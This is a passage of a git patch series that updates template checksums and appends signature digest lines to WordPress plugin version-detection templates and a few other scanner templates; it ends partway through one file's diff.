+http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:efefad163eeb2f30bf2264348f4a5ac8fc001c71 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da6400bb71a3d99ece1b379a73116541b31cc93a -http/technologies/wordpress/plugins/wpforms-lite.yaml:2eb67b0dfbc266ddfa62cd20cf0654f3b71a81a3 -http/technologies/wordpress/plugins/wps-hide-login.yaml:5e0ee6b66a65312646aa9a20ffee777b73ced2c6 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:a31eeabc5080f34a6ef5c8d7e9f8549c5b8728b4 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:1d33a75ebfa1d2e3f465cb7dd4b66d297cd3f104 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:cf9a544627bf169a3572f810cd893cecdfdaec2d http/technologies/wordpress-detect.yaml:743b35c9139a66a10e24776aabe59d58f5e4f63c http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -9488,7 +9489,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:fb981ef70dda84fa021cb2a3cff88af7ba5f060e +templates-checksum.txt:53577732d5951c743ecf26e66717ac7cb9893bdd wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From f91de72de1776c79405a515aad5ba5bbaf836c41 Mon Sep 17 00:00:00 2001 From: ghost Date: Thu, 17 Oct 2024 01:52:31 +0000 Subject: [PATCH 184/218] =?UTF-8?q?chore:=20sign=20templates=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cloud/aws/iam/iam-user-password-change.yaml | 2 +- http/cves/2024/CVE-2024-32739.yaml | 3 +-- http/technologies/wordpress/plugins/ad-inserter.yaml | 2 ++ http/technologies/wordpress/plugins/add-to-any.yaml | 2 ++ http/technologies/wordpress/plugins/admin-menu-editor.yaml | 2 ++ .../technologies/wordpress/plugins/advanced-custom-fields.yaml | 2 ++ http/technologies/wordpress/plugins/akismet.yaml | 2 ++ http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 2 ++ .../wordpress/plugins/all-in-one-wp-migration.yaml | 2 ++ .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 2 ++ http/technologies/wordpress/plugins/amp.yaml | 2 ++ http/technologies/wordpress/plugins/antispam-bee.yaml | 2 ++ http/technologies/wordpress/plugins/astra-sites.yaml | 2 ++ http/technologies/wordpress/plugins/autoptimize.yaml | 2 ++ http/technologies/wordpress/plugins/backwpup.yaml | 2 ++ http/technologies/wordpress/plugins/better-search-replace.yaml | 2 ++ http/technologies/wordpress/plugins/better-wp-security.yaml | 2 ++ .../wordpress/plugins/black-studio-tinymce-widget.yaml | 2 ++ http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 2 ++ http/technologies/wordpress/plugins/breeze.yaml | 2 ++ http/technologies/wordpress/plugins/broken-link-checker.yaml | 2 ++ http/technologies/wordpress/plugins/chaty.yaml | 2 ++ .../wordpress/plugins/child-theme-configurator.yaml | 2 ++ http/technologies/wordpress/plugins/classic-editor.yaml | 2 ++ http/technologies/wordpress/plugins/classic-widgets.yaml | 2 ++ .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 2 ++ http/technologies/wordpress/plugins/cmb2.yaml | 2 ++ http/technologies/wordpress/plugins/coblocks.yaml | 2 ++ http/technologies/wordpress/plugins/code-snippets.yaml | 2 ++ http/technologies/wordpress/plugins/coming-soon.yaml | 2 ++ http/technologies/wordpress/plugins/complianz-gdpr.yaml | 2 ++ .../wordpress/plugins/contact-form-7-honeypot.yaml | 2 ++ http/technologies/wordpress/plugins/contact-form-7.yaml | 2 ++ http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 2 ++ http/technologies/wordpress/plugins/cookie-law-info.yaml | 2 ++ http/technologies/wordpress/plugins/cookie-notice.yaml | 2 ++ http/technologies/wordpress/plugins/copy-delete-posts.yaml | 2 ++ http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 2 ++ .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 2 ++ http/technologies/wordpress/plugins/custom-css-js.yaml | 2 ++ http/technologies/wordpress/plugins/custom-fonts.yaml | 2 ++ http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 2 ++ http/technologies/wordpress/plugins/disable-comments.yaml | 2 ++ http/technologies/wordpress/plugins/disable-gutenberg.yaml | 2 ++ http/technologies/wordpress/plugins/duplicate-page.yaml | 2 ++ http/technologies/wordpress/plugins/duplicate-post.yaml | 2 ++ http/technologies/wordpress/plugins/duplicator.yaml | 2 ++ .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 2 ++ .../technologies/wordpress/plugins/easy-table-of-contents.yaml | 2 ++ http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 2 ++ http/technologies/wordpress/plugins/elementor.yaml | 2 ++ http/technologies/wordpress/plugins/elementskit-lite.yaml | 2 ++ http/technologies/wordpress/plugins/enable-media-replace.yaml | 2 ++ http/technologies/wordpress/plugins/envato-elements.yaml | 2 ++ .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 2 ++ http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 2 ++ http/technologies/wordpress/plugins/extendify.yaml | 2 ++ .../wordpress/plugins/facebook-for-woocommerce.yaml | 2 ++ http/technologies/wordpress/plugins/fast-indexing-api.yaml | 2 ++ http/technologies/wordpress/plugins/flamingo.yaml | 2 ++ http/technologies/wordpress/plugins/fluent-smtp.yaml | 2 ++ http/technologies/wordpress/plugins/fluentform.yaml | 2 ++ http/technologies/wordpress/plugins/font-awesome.yaml | 2 ++ .../wordpress/plugins/force-regenerate-thumbnails.yaml | 2 ++ http/technologies/wordpress/plugins/formidable.yaml | 2 ++ http/technologies/wordpress/plugins/forminator.yaml | 2 ++ http/technologies/wordpress/plugins/ga-google-analytics.yaml | 2 ++ .../technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 2 ++ .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 2 ++ .../wordpress/plugins/google-analytics-for-wordpress.yaml | 2 ++ .../wordpress/plugins/google-listings-and-ads.yaml | 2 ++ http/technologies/wordpress/plugins/google-site-kit.yaml | 2 ++ .../wordpress/plugins/google-sitemap-generator.yaml | 2 ++ http/technologies/wordpress/plugins/gtranslate.yaml | 2 ++ http/technologies/wordpress/plugins/gutenberg.yaml | 2 ++ .../technologies/wordpress/plugins/happy-elementor-addons.yaml | 2 ++ .../wordpress/plugins/header-footer-code-manager.yaml | 2 ++ .../wordpress/plugins/header-footer-elementor.yaml | 2 ++ http/technologies/wordpress/plugins/header-footer.yaml | 2 ++ http/technologies/wordpress/plugins/health-check.yaml | 2 ++ http/technologies/wordpress/plugins/hello-dolly.yaml | 2 ++ http/technologies/wordpress/plugins/host-webfonts-local.yaml | 2 ++ http/technologies/wordpress/plugins/hostinger.yaml | 2 ++ http/technologies/wordpress/plugins/image-optimization.yaml | 2 ++ http/technologies/wordpress/plugins/imagify.yaml | 2 ++ .../wordpress/plugins/insert-headers-and-footers.yaml | 2 ++ http/technologies/wordpress/plugins/instagram-feed.yaml | 2 ++ .../wordpress/plugins/intuitive-custom-post-order.yaml | 2 ++ http/technologies/wordpress/plugins/jetpack-boost.yaml | 2 ++ http/technologies/wordpress/plugins/jetpack.yaml | 2 ++ http/technologies/wordpress/plugins/kadence-blocks.yaml | 2 ++ http/technologies/wordpress/plugins/kirki.yaml | 2 ++ http/technologies/wordpress/plugins/leadin.yaml | 2 ++ .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 2 ++ http/technologies/wordpress/plugins/limit-login-attempts.yaml | 2 ++ http/technologies/wordpress/plugins/litespeed-cache.yaml | 2 ++ http/technologies/wordpress/plugins/loco-translate.yaml | 2 ++ http/technologies/wordpress/plugins/loginizer.yaml | 2 ++ .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 2 ++ http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 2 ++ http/technologies/wordpress/plugins/mailpoet.yaml | 2 ++ http/technologies/wordpress/plugins/maintenance.yaml | 2 ++ http/technologies/wordpress/plugins/mainwp-child.yaml | 2 ++ http/technologies/wordpress/plugins/malcare-security.yaml | 2 ++ http/technologies/wordpress/plugins/megamenu.yaml | 2 ++ http/technologies/wordpress/plugins/members.yaml | 2 ++ http/technologies/wordpress/plugins/meta-box.yaml | 2 ++ http/technologies/wordpress/plugins/metform.yaml | 2 ++ http/technologies/wordpress/plugins/ml-slider.yaml | 2 ++ http/technologies/wordpress/plugins/newsletter.yaml | 2 ++ .../wordpress/plugins/nextend-facebook-connect.yaml | 2 ++ http/technologies/wordpress/plugins/nextgen-gallery.yaml | 2 ++ http/technologies/wordpress/plugins/ninja-forms.yaml | 2 ++ http/technologies/wordpress/plugins/ocean-extra.yaml | 2 ++ .../wordpress/plugins/official-facebook-pixel.yaml | 2 ++ http/technologies/wordpress/plugins/one-click-demo-import.yaml | 2 ++ http/technologies/wordpress/plugins/optinmonster.yaml | 2 ++ http/technologies/wordpress/plugins/otter-blocks.yaml | 2 ++ http/technologies/wordpress/plugins/password-protected.yaml | 2 ++ http/technologies/wordpress/plugins/pdf-embedder.yaml | 2 ++ .../wordpress/plugins/pinterest-for-woocommerce.yaml | 2 ++ http/technologies/wordpress/plugins/pixelyoursite.yaml | 2 ++ http/technologies/wordpress/plugins/polylang.yaml | 2 ++ http/technologies/wordpress/plugins/popup-maker.yaml | 2 ++ http/technologies/wordpress/plugins/post-smtp.yaml | 2 ++ http/technologies/wordpress/plugins/post-types-order.yaml | 2 ++ .../wordpress/plugins/premium-addons-for-elementor.yaml | 2 ++ http/technologies/wordpress/plugins/pretty-link.yaml | 2 ++ http/technologies/wordpress/plugins/really-simple-captcha.yaml | 2 ++ http/technologies/wordpress/plugins/really-simple-ssl.yaml | 2 ++ http/technologies/wordpress/plugins/redirection.yaml | 2 ++ http/technologies/wordpress/plugins/redux-framework.yaml | 2 ++ http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 2 ++ .../technologies/wordpress/plugins/royal-elementor-addons.yaml | 2 ++ http/technologies/wordpress/plugins/safe-svg.yaml | 2 ++ http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 2 ++ http/technologies/wordpress/plugins/sg-cachepress.yaml | 2 ++ http/technologies/wordpress/plugins/sg-security.yaml | 2 ++ http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 2 ++ .../wordpress/plugins/shortpixel-image-optimiser.yaml | 2 ++ .../wordpress/plugins/simple-custom-post-order.yaml | 2 ++ http/technologies/wordpress/plugins/simple-history.yaml | 2 ++ http/technologies/wordpress/plugins/siteguard.yaml | 2 ++ http/technologies/wordpress/plugins/siteorigin-panels.yaml | 2 ++ http/technologies/wordpress/plugins/smart-slider-3.yaml | 2 ++ http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 2 ++ .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 2 ++ .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 2 ++ http/technologies/wordpress/plugins/sucuri-scanner.yaml | 2 ++ http/technologies/wordpress/plugins/svg-support.yaml | 2 ++ http/technologies/wordpress/plugins/tablepress.yaml | 2 ++ http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 2 ++ http/technologies/wordpress/plugins/templately.yaml | 2 ++ http/technologies/wordpress/plugins/the-events-calendar.yaml | 2 ++ http/technologies/wordpress/plugins/tinymce-advanced.yaml | 2 ++ .../wordpress/plugins/translatepress-multilingual.yaml | 2 ++ .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 2 ++ .../wordpress/plugins/under-construction-page.yaml | 2 ++ http/technologies/wordpress/plugins/updraftplus.yaml | 2 ++ http/technologies/wordpress/plugins/user-role-editor.yaml | 2 ++ http/technologies/wordpress/plugins/w3-total-cache.yaml | 2 ++ .../wordpress/plugins/webp-converter-for-media.yaml | 2 ++ http/technologies/wordpress/plugins/webp-express.yaml | 2 ++ .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 2 ++ .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 2 ++ .../technologies/wordpress/plugins/woo-variation-swatches.yaml | 2 ++ .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 2 ++ .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 2 ++ http/technologies/wordpress/plugins/woocommerce-payments.yaml | 2 ++ .../wordpress/plugins/woocommerce-paypal-payments.yaml | 2 ++ .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 2 ++ http/technologies/wordpress/plugins/woocommerce-services.yaml | 2 ++ http/technologies/wordpress/plugins/woocommerce.yaml | 2 ++ http/technologies/wordpress/plugins/wordfence.yaml | 2 ++ http/technologies/wordpress/plugins/wordpress-importer.yaml | 2 ++ http/technologies/wordpress/plugins/wordpress-seo.yaml | 2 ++ http/technologies/wordpress/plugins/worker.yaml | 2 ++ http/technologies/wordpress/plugins/wp-crontrol.yaml | 2 ++ http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 2 ++ http/technologies/wordpress/plugins/wp-file-manager.yaml | 2 ++ http/technologies/wordpress/plugins/wp-google-maps.yaml | 2 ++ http/technologies/wordpress/plugins/wp-mail-logging.yaml | 2 ++ http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 2 ++ http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 2 ++ http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 2 ++ http/technologies/wordpress/plugins/wp-optimize.yaml | 2 ++ http/technologies/wordpress/plugins/wp-pagenavi.yaml | 2 ++ http/technologies/wordpress/plugins/wp-reset.yaml | 2 ++ .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 2 ++ http/technologies/wordpress/plugins/wp-rollback.yaml | 2 ++ http/technologies/wordpress/plugins/wp-seopress.yaml | 2 ++ http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 2 ++ http/technologies/wordpress/plugins/wp-smushit.yaml | 2 ++ http/technologies/wordpress/plugins/wp-statistics.yaml | 2 ++ http/technologies/wordpress/plugins/wp-super-cache.yaml | 2 ++ http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 2 ++ http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 2 ++ http/technologies/wordpress/plugins/wpforms-lite.yaml | 2 ++ http/technologies/wordpress/plugins/wps-hide-login.yaml | 2 ++ http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 2 ++ .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 2 ++ 201 files changed, 400 insertions(+), 3 deletions(-) diff --git a/cloud/aws/iam/iam-user-password-change.yaml b/cloud/aws/iam/iam-user-password-change.yaml index 2ad736c260..73d83c5ae0 100644 --- a/cloud/aws/iam/iam-user-password-change.yaml +++ b/cloud/aws/iam/iam-user-password-change.yaml @@ -26,4 +26,4 @@ code: - type: dsl dsl: - '"AllowUsersToChangePassword Policy is not enabled in your AWS account"' -# digest: 4b0a00483046022100b046545d3c72c54dee9c4051661d61c8241cbce1fb0f655fa4bb1e8461b3f295022100a7bb33ba3ddff07e68db9bd748802715215b8d62be69ab27fab22c5e539cbb28:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a110f462d8f5e4466b712fd0e894e70d3f25a2880789f42656e9a234f347f0ed022100c3b0fa07fb3f150db61f3c0715c8197371d98a9b4fe21f2837c2243ceb33b064:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-32739.yaml b/http/cves/2024/CVE-2024-32739.yaml index 214a16a96d..9cf52937fa 100644 --- a/http/cves/2024/CVE-2024-32739.yaml +++ b/http/cves/2024/CVE-2024-32739.yaml @@ -52,5 +52,4 @@ http: group: 1 regex: - '"code":"([0-9.]+)"' - -# digest: 4b0a00483046022100fbba0916ea93e23792903e13822a024da4145477a0fe5be9d0319fd5599fb6bf022100cf5bb4ac915a13c315177ad92b237c743a7cbc3823e6e04bce75d9692b35f414:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200ffa17a1de5c623b46e49af72f6055b5228e418de21534a4561aff6f028389320220506cabd2ac593cce3589ceb0527c52e358373d3ac6e9970d4ba83c715077b378:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749..12c8747910 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022067d894a59a480f8185bd3f47b204ef496d8ca36f9839fae4124c7e3cdd716f6c022100bdf355ce60df502dc12072ce1c45a6d9c7c67ca40145f8fff8fdb12b9f527ba7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b63..3ed72518ae 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100fb1727303d8d8fd53dc739ec631bc73a13354d0add200b50121b78566980a0dc02202afd9ea5a072dad687b4735038c6eb33ba5e72ec499d5ee4b1294d09a2cbdc9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc8..13fb467dd9 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100836a4bae257ad1e2fcba1d846b1250f18deac824c94fcaae59a1d875f49190d702201cccfae86cc06d471bf87ab012cbd798bddf5b86f8b98e35a4f48a14a987c33c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 1f02455962..9f78d41a92 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100fcf405f28c461e6e05bf56b9377541eae96bdb76e8e563a5abe89dec609ad2af022100ca86e0accbde583778147d6908be0af7cf059514685414b2abd80bf3d79127a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 6f253f9f55..7ea877fcdf 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100f20f395fce43690b633c95bae96692b832dc594482270e39b87c79716cd1a118022014710a1c8bcc54c551331717764d3e5d88be4e688f3bb73b71eb28da50564f67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index fe45de4d04..d581e0f70b 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502204a3d8d2afa91d97c222f054340a6be0d320ac3a5044a6a25969841b77b12c5b7022100929b0d821a67e84b20af8b9d6d0017ecd98c7776894b646f45c9e5c645984db7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 69e425f446..cd96d1edaa 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502204aa2b1e34dba7834c0d6c5a2eaf2a5d0f9e4f1f9169aa801096bcb2617a30d7a022100a5c334b1b2f2eaaff8486f1908d1936b67e9c3aea2e319d47c04c07b95d3a304:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 9c07c65e4e..ab29958f23 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220020080415d0ceeee7b561e019f4018fee6def9f31444cebd631a635e1d96d0d3022100e793cdb39a3bad1a31c444f3fe14df8e996414357e7b4b9a655592a26dd1d88a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 92c8f5656e..f46f2bab84 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100a1d21a563fb92425111f3f4fa238996297be5e8c81797c88f66b06e52b10b6760220633a87c3238feb02d9ce2b3651f3097a74c1052e62637e5bdb7a4ea2ad9f7a2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 70975a19a1..ab4b2d4042 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100c53549f316427688bbbd1a0bee38cfe6f0bb816a56e005de716a8bb739900473022100a4141898cd48ebbe73c3133771c579f2425e6092edf6f751b7473db708e06e7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..abceedbcc4 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100a7ec516665275cf18974840f2055ae95eb799d68c765a4a05293d41a3dd3445c0220300d2a25f4378de8f1b830cb7b0706e02324ac991d235c11aab3cc1fdb97a5d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..ac0ca40352 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100a467c4323bb06cddb66997c17655a0beb4d5883bfff18dda63c2d5755887bcbb02205c550565517c37469d46ff9ebe451fe28b4dc2bd496874873cd7c3a9bac2f5ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2c..9de42ac6c8 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100dcb3e41e2f45e39a336cfdf69bb16431d464f30381213ea4a4c7cc2d1c8ae955022100ee0e9f2a4eb372b70424497d63a7363cff86268150cdec5754dceeab2f737e7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..a1f8d58726 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a004830460221008c946ccab5d142806073881c50c6d5678fcf61211111f00ec5e8a3f1f872f1f3022100dd295c97d17f2975280ce3e0c47d3cc9374570d98911685cab986a738ae894dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..b8e32c7aa3 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100f40603d6b6ccdb92bde7b723465098739589e26a6f70e4d773021a9452395786022070d2745f1d27cc481b82ea547f09b8da227372180400051254059b08085c9cf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..392b9add09 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502207210aa14e231fcca4e4848e86ffeeef7cb3c6081f08c33709dc64d99f08f29c7022100eb06a4a08d0ec96bc221e3a5c5a2c5b0e869984a7de9505b99f71b49e365ecd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..eeab5f0256 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502204e076d6e98c547384680bf111d8e69e7ca4a14eeb9da21c443e86a349af09f0a022100e20a845c8e26112994c4f5a3b48f8665ddc7ac0adc79cbc1751488406712ef01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..5bbcdc66d0 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402201b4df66c9e59936d4ff6f40a6e85f8e3cdf78912ddacde9944bd25dbd3424ec2022055c079f2c136dfe5494abb6d83f3217f6a3b6f61edf210d34dd847cb21f528a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index f8691caf0a..bdfacde1f4 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ 